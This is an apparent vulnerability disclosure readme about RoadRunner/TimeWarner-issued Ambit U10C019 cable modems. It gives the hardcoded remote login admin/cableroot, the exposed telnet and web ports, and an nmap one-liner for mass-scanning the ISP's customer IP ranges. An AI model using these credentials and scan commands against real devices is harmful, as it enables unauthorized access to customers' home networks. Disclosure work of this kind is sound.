Hello. This is the introduction to a large-scale RoadRunner Cable-Router exploit on the Ambit U10C019 CableModem.

Basically, the default Cable Router that RoadRunner/TimeWarner gives to its customers by default:
 1) Allows for remote login with user: admin, password: cableroot.
 2) Allows remote access by default. (port 64623 for telnet, port 64680 for webui)

Devices affected:
Ambit U10C019 CableModem
Boot code revision : 2.1.6d
Hardware revision : 4.10
Software revision : 5.66.1026
Software build time : Feb 26 2009 12:53:26


Example for scanning the RoadRunner IP ranges:
nmap -PN -T5 --open -p64623 -n -P0 --max-retries 0 --host-timeout 5s -iL rr.lst >> nmap.log; cat nmap.log | grep -B 3 open > open.log

Contained in this archive contains:
 rr.lst - list of RoadRunner CIDR blocks.
 open-cleaned.txt - my initial scan of the ranges to see a rough estimate of number of affected devices.
 readme.txt - this file..


This hole appears to have been patched with a firmware update:

$ telnet device.ip 64623
Trying device.ip...
Connected to device.ip.
Escape character is '^]'.
Connection closed by foreign host.

$ curl -vvv 24.172.42.225:64680
* About to connect() to device.ip port 64680 (#0)
*   Trying device.ip... connected
* Connected to device.ip (device.ip) port 64680 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.21.0 (x86_64-unknown-linux-gnu) libcurl/7.21.0 OpenSSL/1.0.0a zlib/1.2.5
> Host: device.ip:64680
> Accept: */*
> 
* Empty reply from server
* Connection #0 to host device.ip left intact
curl: (52) Empty reply from server
* Closing connection #0


I use the phrase "appears", as I am unsure. Michael O'Donnel at Road Runner, who is the Chief of Security (if I recall correctly), said he would work 
on it. Later, I did not receive much more contact after the *8 weeks of time* after I contacted them. Recent attempts to contact Michael via leaving 
a voicemail got no reply. (Maybe I shouldn't have been so polite in my disclosure to them?)



Keep safe.
--
Harry Strongburg <harry.fd at harry.lu>